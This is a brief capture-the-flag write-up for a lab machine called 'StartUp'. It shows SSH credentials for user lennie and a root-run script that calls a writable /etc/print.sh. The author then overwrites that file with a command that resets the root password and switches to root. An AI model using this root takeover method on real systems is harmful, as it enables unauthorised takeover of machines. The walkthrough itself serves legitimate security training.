StartUp
Privilege Escalation
- Using
SSH
Credentials to Login: lennie:c4ntg3t3n0ughsp1c3
lennie@startup ~$ id
uid=1002(lennie) gid=1002(lennie) groups=1002(lennie)
- There is a
Script
in the lennie Home Directory. The Script is Owned by ROOT. - We have Read - Write Access on the Script:
/etc/print.sh
lennie@startup ~$ ls -l scripts/
total 8
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Oct 7 08:43 startup_list.txt
lennie@startup ~$ cat scripts/planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
- Modifying the Script to change ROOT Password
lennie@startup ~$ echo 'echo -e "password\npassword" | passwd root' > /etc/print.sh
- We can change the User from
lennie ➜ root
by using the Password: password
lennie@startup ~$ su -
Password:
root@startup:~$ id
uid=0(root) gid=0(root) groups=0(root)